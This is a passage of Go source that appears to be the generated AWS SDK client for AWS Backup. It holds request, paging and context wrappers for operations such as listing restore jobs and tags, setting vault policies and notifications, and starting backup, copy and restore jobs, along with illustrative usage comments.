// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRecoveryPointsByResource
func (c *Backup) ListRecoveryPointsByResource(input *ListRecoveryPointsByResourceInput) (*ListRecoveryPointsByResourceOutput, error) {
req, out := c.ListRecoveryPointsByResourceRequest(input)
return out, req.Send()
}
// ListRecoveryPointsByResourceWithContext is the same as ListRecoveryPointsByResource with the addition of
// the ability to pass a context and additional request options.
//
// See ListRecoveryPointsByResource for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRecoveryPointsByResourceWithContext(ctx aws.Context, input *ListRecoveryPointsByResourceInput, opts ...request.Option) (*ListRecoveryPointsByResourceOutput, error) {
req, out := c.ListRecoveryPointsByResourceRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListRecoveryPointsByResourcePages iterates over the pages of a ListRecoveryPointsByResource operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListRecoveryPointsByResource method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListRecoveryPointsByResource operation.
// pageNum := 0
// err := client.ListRecoveryPointsByResourcePages(params,
// func(page *backup.ListRecoveryPointsByResourceOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListRecoveryPointsByResourcePages(input *ListRecoveryPointsByResourceInput, fn func(*ListRecoveryPointsByResourceOutput, bool) bool) error {
return c.ListRecoveryPointsByResourcePagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListRecoveryPointsByResourcePagesWithContext is the same as ListRecoveryPointsByResourcePages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRecoveryPointsByResourcePagesWithContext(ctx aws.Context, input *ListRecoveryPointsByResourceInput, fn func(*ListRecoveryPointsByResourceOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListRecoveryPointsByResourceInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListRecoveryPointsByResourceRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListRecoveryPointsByResourceOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
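// The resource-scoped variant keys off an ARN rather than a vault name; a
// sketch with a placeholder resource ARN.
//
//    err := svc.ListRecoveryPointsByResourcePages(
//        &backup.ListRecoveryPointsByResourceInput{ResourceArn: aws.String("<resource-arn>")},
//        func(page *backup.ListRecoveryPointsByResourceOutput, lastPage bool) bool {
//            for _, rp := range page.RecoveryPoints {
//                fmt.Println(aws.StringValue(rp.RecoveryPointArn), aws.StringValue(rp.Status))
//            }
//            return true
//        })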
const opListRestoreJobs = "ListRestoreJobs"
// ListRestoreJobsRequest generates a "aws/request.Request" representing the
// client's request for the ListRestoreJobs operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListRestoreJobs for more information on using the ListRestoreJobs
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListRestoreJobsRequest method.
// req, resp := client.ListRestoreJobsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRestoreJobs
func (c *Backup) ListRestoreJobsRequest(input *ListRestoreJobsInput) (req *request.Request, output *ListRestoreJobsOutput) {
op := &request.Operation{
Name: opListRestoreJobs,
HTTPMethod: "GET",
HTTPPath: "/restore-jobs/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListRestoreJobsInput{}
}
output = &ListRestoreJobsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListRestoreJobs API operation for AWS Backup.
//
// Returns a list of jobs that AWS Backup initiated to restore a saved resource,
// including metadata about the recovery process.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListRestoreJobs for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRestoreJobs
func (c *Backup) ListRestoreJobs(input *ListRestoreJobsInput) (*ListRestoreJobsOutput, error) {
req, out := c.ListRestoreJobsRequest(input)
return out, req.Send()
}
// ListRestoreJobsWithContext is the same as ListRestoreJobs with the addition of
// the ability to pass a context and additional request options.
//
// See ListRestoreJobs for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRestoreJobsWithContext(ctx aws.Context, input *ListRestoreJobsInput, opts ...request.Option) (*ListRestoreJobsOutput, error) {
req, out := c.ListRestoreJobsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListRestoreJobsPages iterates over the pages of a ListRestoreJobs operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListRestoreJobs method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListRestoreJobs operation.
// pageNum := 0
// err := client.ListRestoreJobsPages(params,
// func(page *backup.ListRestoreJobsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListRestoreJobsPages(input *ListRestoreJobsInput, fn func(*ListRestoreJobsOutput, bool) bool) error {
return c.ListRestoreJobsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListRestoreJobsPagesWithContext is the same as ListRestoreJobsPages, except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRestoreJobsPagesWithContext(ctx aws.Context, input *ListRestoreJobsInput, fn func(*ListRestoreJobsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListRestoreJobsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListRestoreJobsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListRestoreJobsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
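// A minimal pagination sketch (illustrative only, not part of the generated
// API): listing restore jobs under a cancellable context. The use of a
// context.WithTimeout value as an aws.Context and the RestoreJobs output
// field are assumptions about the caller's setup and the service shapes; they
// are not shown above.
//
//    ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
//    defer cancel()
//    err := client.ListRestoreJobsPagesWithContext(ctx, &backup.ListRestoreJobsInput{},
//        func(page *backup.ListRestoreJobsOutput, lastPage bool) bool {
//            fmt.Println(len(page.RestoreJobs), "restore jobs on this page")
//            return true // keep paging until the last page
//        })
//    if err != nil {
//        fmt.Println(err)
//    }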
const opListTags = "ListTags"
// ListTagsRequest generates a "aws/request.Request" representing the
// client's request for the ListTags operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListTags for more information on using the ListTags
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListTagsRequest method.
// req, resp := client.ListTagsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListTags
func (c *Backup) ListTagsRequest(input *ListTagsInput) (req *request.Request, output *ListTagsOutput) {
op := &request.Operation{
Name: opListTags,
HTTPMethod: "GET",
HTTPPath: "/tags/{resourceArn}/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListTagsInput{}
}
output = &ListTagsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListTags API operation for AWS Backup.
//
// Returns a list of key-value pairs assigned to a target recovery point, backup
// plan, or backup vault.
//
// ListTags is currently supported only for Amazon EFS backups.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListTags for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListTags
func (c *Backup) ListTags(input *ListTagsInput) (*ListTagsOutput, error) {
req, out := c.ListTagsRequest(input)
return out, req.Send()
}
// ListTagsWithContext is the same as ListTags with the addition of
// the ability to pass a context and additional request options.
//
// See ListTags for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListTagsWithContext(ctx aws.Context, input *ListTagsInput, opts ...request.Option) (*ListTagsOutput, error) {
req, out := c.ListTagsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListTagsPages iterates over the pages of a ListTags operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListTags method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListTags operation.
// pageNum := 0
// err := client.ListTagsPages(params,
// func(page *backup.ListTagsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListTagsPages(input *ListTagsInput, fn func(*ListTagsOutput, bool) bool) error {
return c.ListTagsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListTagsPagesWithContext is the same as ListTagsPages, except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListTagsPagesWithContext(ctx aws.Context, input *ListTagsInput, fn func(*ListTagsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListTagsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListTagsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListTagsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
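// A minimal sketch (illustrative only): listing the tags on a recovery point.
// The ResourceArn input field and the Tags output field are assumptions about
// the service shapes; they are not shown above.
//
//    err := client.ListTagsPages(&backup.ListTagsInput{
//        ResourceArn: aws.String("arn:aws:backup:us-east-1:123456789012:recovery-point:example"),
//    }, func(page *backup.ListTagsOutput, lastPage bool) bool {
//        for k, v := range page.Tags {
//            fmt.Println(k, "=", aws.StringValue(v))
//        }
//        return true
//    })
//    if err != nil {
//        fmt.Println(err)
//    }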
const opPutBackupVaultAccessPolicy = "PutBackupVaultAccessPolicy"
// PutBackupVaultAccessPolicyRequest generates a "aws/request.Request" representing the
// client's request for the PutBackupVaultAccessPolicy operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See PutBackupVaultAccessPolicy for more information on using the PutBackupVaultAccessPolicy
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the PutBackupVaultAccessPolicyRequest method.
// req, resp := client.PutBackupVaultAccessPolicyRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/PutBackupVaultAccessPolicy
func (c *Backup) PutBackupVaultAccessPolicyRequest(input *PutBackupVaultAccessPolicyInput) (req *request.Request, output *PutBackupVaultAccessPolicyOutput) {
op := &request.Operation{
Name: opPutBackupVaultAccessPolicy,
HTTPMethod: "PUT",
HTTPPath: "/backup-vaults/{backupVaultName}/access-policy",
}
if input == nil {
input = &PutBackupVaultAccessPolicyInput{}
}
output = &PutBackupVaultAccessPolicyOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// PutBackupVaultAccessPolicy API operation for AWS Backup.
//
// Sets a resource-based policy that is used to manage access permissions on
// the target backup vault. Requires a backup vault name and an access policy
// document in JSON format.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation PutBackupVaultAccessPolicy for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/PutBackupVaultAccessPolicy
func (c *Backup) PutBackupVaultAccessPolicy(input *PutBackupVaultAccessPolicyInput) (*PutBackupVaultAccessPolicyOutput, error) {
req, out := c.PutBackupVaultAccessPolicyRequest(input)
return out, req.Send()
}
// PutBackupVaultAccessPolicyWithContext is the same as PutBackupVaultAccessPolicy with the addition of
// the ability to pass a context and additional request options.
//
// See PutBackupVaultAccessPolicy for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) PutBackupVaultAccessPolicyWithContext(ctx aws.Context, input *PutBackupVaultAccessPolicyInput, opts ...request.Option) (*PutBackupVaultAccessPolicyOutput, error) {
req, out := c.PutBackupVaultAccessPolicyRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
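// A minimal sketch (illustrative only): attaching an access policy to a vault.
// The BackupVaultName and Policy input fields are assumptions about the
// service shapes and are not shown above; the policy document itself is a
// plain JSON string.
//
//    policy := `{"Version":"2012-10-17","Statement":[]}`
//    _, err := client.PutBackupVaultAccessPolicy(&backup.PutBackupVaultAccessPolicyInput{
//        BackupVaultName: aws.String("aBackupVault"),
//        Policy:          aws.String(policy),
//    })
//    if err != nil {
//        fmt.Println(err)
//    }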
const opPutBackupVaultNotifications = "PutBackupVaultNotifications"
// PutBackupVaultNotificationsRequest generates a "aws/request.Request" representing the
// client's request for the PutBackupVaultNotifications operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See PutBackupVaultNotifications for more information on using the PutBackupVaultNotifications
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the PutBackupVaultNotificationsRequest method.
// req, resp := client.PutBackupVaultNotificationsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/PutBackupVaultNotifications
func (c *Backup) PutBackupVaultNotificationsRequest(input *PutBackupVaultNotificationsInput) (req *request.Request, output *PutBackupVaultNotificationsOutput) {
op := &request.Operation{
Name: opPutBackupVaultNotifications,
HTTPMethod: "PUT",
HTTPPath: "/backup-vaults/{backupVaultName}/notification-configuration",
}
if input == nil {
input = &PutBackupVaultNotificationsInput{}
}
output = &PutBackupVaultNotificationsOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// PutBackupVaultNotifications API operation for AWS Backup.
//
// Turns on notifications on a backup vault for the specified topic and events.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation PutBackupVaultNotifications for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/PutBackupVaultNotifications
func (c *Backup) PutBackupVaultNotifications(input *PutBackupVaultNotificationsInput) (*PutBackupVaultNotificationsOutput, error) {
req, out := c.PutBackupVaultNotificationsRequest(input)
return out, req.Send()
}
// PutBackupVaultNotificationsWithContext is the same as PutBackupVaultNotifications with the addition of
// the ability to pass a context and additional request options.
//
// See PutBackupVaultNotifications for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) PutBackupVaultNotificationsWithContext(ctx aws.Context, input *PutBackupVaultNotificationsInput, opts ...request.Option) (*PutBackupVaultNotificationsOutput, error) {
req, out := c.PutBackupVaultNotificationsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
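// A minimal sketch (illustrative only): turning on vault notifications. The
// BackupVaultName, SNSTopicArn, and BackupVaultEvents input fields, and the
// event name used, are assumptions about the service shapes, not shown above.
//
//    _, err := client.PutBackupVaultNotifications(&backup.PutBackupVaultNotificationsInput{
//        BackupVaultName:   aws.String("aBackupVault"),
//        SNSTopicArn:       aws.String("arn:aws:sns:us-east-1:123456789012:backup-events"),
//        BackupVaultEvents: []*string{aws.String("BACKUP_JOB_COMPLETED")},
//    })
//    if err != nil {
//        fmt.Println(err)
//    }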
const opStartBackupJob = "StartBackupJob"
// StartBackupJobRequest generates a "aws/request.Request" representing the
// client's request for the StartBackupJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See StartBackupJob for more information on using the StartBackupJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the StartBackupJobRequest method.
// req, resp := client.StartBackupJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartBackupJob
func (c *Backup) StartBackupJobRequest(input *StartBackupJobInput) (req *request.Request, output *StartBackupJobOutput) {
op := &request.Operation{
Name: opStartBackupJob,
HTTPMethod: "PUT",
HTTPPath: "/backup-jobs",
}
if input == nil {
input = &StartBackupJobInput{}
}
output = &StartBackupJobOutput{}
req = c.newRequest(op, input, output)
return
}
// StartBackupJob API operation for AWS Backup.
//
// Starts an on-demand backup job for the specified resource.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation StartBackupJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartBackupJob
func (c *Backup) StartBackupJob(input *StartBackupJobInput) (*StartBackupJobOutput, error) {
req, out := c.StartBackupJobRequest(input)
return out, req.Send()
}
// StartBackupJobWithContext is the same as StartBackupJob with the addition of
// the ability to pass a context and additional request options.
//
// See StartBackupJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) StartBackupJobWithContext(ctx aws.Context, input *StartBackupJobInput, opts ...request.Option) (*StartBackupJobOutput, error) {
req, out := c.StartBackupJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
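// A minimal sketch (illustrative only): starting an on-demand backup job. The
// BackupVaultName, IamRoleArn, and ResourceArn input fields are assumptions
// about the service shapes and are not shown above.
//
//    out, err := client.StartBackupJob(&backup.StartBackupJobInput{
//        BackupVaultName: aws.String("aBackupVault"),
//        IamRoleArn:      aws.String("arn:aws:iam::123456789012:role/service-role/AWSBackupDefaultServiceRole"),
//        ResourceArn:     aws.String("arn:aws:ec2:us-east-1:123456789012:volume/vol-0123456789abcdef0"),
//    })
//    if err == nil {
//        fmt.Println(out) // the output carries the new backup job's identifier
//    }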
const opStartCopyJob = "StartCopyJob"
// StartCopyJobRequest generates a "aws/request.Request" representing the
// client's request for the StartCopyJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See StartCopyJob for more information on using the StartCopyJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the StartCopyJobRequest method.
// req, resp := client.StartCopyJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartCopyJob
func (c *Backup) StartCopyJobRequest(input *StartCopyJobInput) (req *request.Request, output *StartCopyJobOutput) {
op := &request.Operation{
Name: opStartCopyJob,
HTTPMethod: "PUT",
HTTPPath: "/copy-jobs",
}
if input == nil {
input = &StartCopyJobInput{}
}
output = &StartCopyJobOutput{}
req = c.newRequest(op, input, output)
return
}
// StartCopyJob API operation for AWS Backup.
//
// Starts a job to create a one-time copy of the specified resource.
//
// Does not support continuous backups.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation StartCopyJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartCopyJob
func (c *Backup) StartCopyJob(input *StartCopyJobInput) (*StartCopyJobOutput, error) {
req, out := c.StartCopyJobRequest(input)
return out, req.Send()
}
// StartCopyJobWithContext is the same as StartCopyJob with the addition of
// the ability to pass a context and additional request options.
//
// See StartCopyJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) StartCopyJobWithContext(ctx aws.Context, input *StartCopyJobInput, opts ...request.Option) (*StartCopyJobOutput, error) {
req, out := c.StartCopyJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
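// A minimal sketch (illustrative only): copying a recovery point to another
// vault. The RecoveryPointArn, SourceBackupVaultName, DestinationBackupVaultArn,
// and IamRoleArn input fields are assumptions about the service shapes.
//
//    _, err := client.StartCopyJob(&backup.StartCopyJobInput{
//        RecoveryPointArn:          aws.String("arn:aws:backup:us-east-1:123456789012:recovery-point:example"),
//        SourceBackupVaultName:     aws.String("sourceVault"),
//        DestinationBackupVaultArn: aws.String("arn:aws:backup:us-west-2:123456789012:backup-vault:destVault"),
//        IamRoleArn:                aws.String("arn:aws:iam::123456789012:role/service-role/AWSBackupDefaultServiceRole"),
//    })
//    if err != nil {
//        fmt.Println(err)
//    }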
const opStartRestoreJob = "StartRestoreJob"
// StartRestoreJobRequest generates a "aws/request.Request" representing the
// client's request for the StartRestoreJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See StartRestoreJob for more information on using the StartRestoreJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the StartRestoreJobRequest method.
// req, resp := client.StartRestoreJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartRestoreJob
func (c *Backup) StartRestoreJobRequest(input *StartRestoreJobInput) (req *request.Request, output *StartRestoreJobOutput) {
op := &request.Operation{
Name: opStartRestoreJob,
HTTPMethod: "PUT",
HTTPPath: "/restore-jobs",
}
if input == nil {
input = &StartRestoreJobInput{}
}
output = &StartRestoreJobOutput{}
req = c.newRequest(op, input, output)
return
}
// StartRestoreJob API operation for AWS Backup.
//
// Recovers the saved resource identified by an Amazon Resource Name (ARN).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation StartRestoreJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartRestoreJob
func (c *Backup) StartRestoreJob(input *StartRestoreJobInput) (*StartRestoreJobOutput, error) {
req, out := c.StartRestoreJobRequest(input)
return out, req.Send()
}
// StartRestoreJobWithContext is the same as StartRestoreJob with the addition of
// the ability to pass a context and additional request options.
//
// See StartRestoreJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) StartRestoreJobWithContext(ctx aws.Context, input *StartRestoreJobInput, opts ...request.Option) (*StartRestoreJobOutput, error) {
req, out := c.StartRestoreJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
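// A minimal sketch (illustrative only): restoring a recovery point. The
// RecoveryPointArn, IamRoleArn, and Metadata input fields are assumptions
// about the service shapes; the required Metadata keys vary by resource type,
// and the key shown here is only an example.
//
//    _, err := client.StartRestoreJob(&backup.StartRestoreJobInput{
//        RecoveryPointArn: aws.String("arn:aws:backup:us-east-1:123456789012:recovery-point:example"),
//        IamRoleArn:       aws.String("arn:aws:iam::123456789012:role/service-role/AWSBackupDefaultServiceRole"),
//        Metadata: map[string]*string{
//            "newFileSystem": aws.String("true"), // example EFS-style restore metadata
//        },
//    })
//    if err != nil {
//        fmt.Println(err)
//    }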
const opStopBackupJob = "StopBackupJob"
// StopBackupJobRequest generates a "aws/request.Request" representing the
// client's request for the StopBackupJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See StopBackupJob for more information on using the StopBackupJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
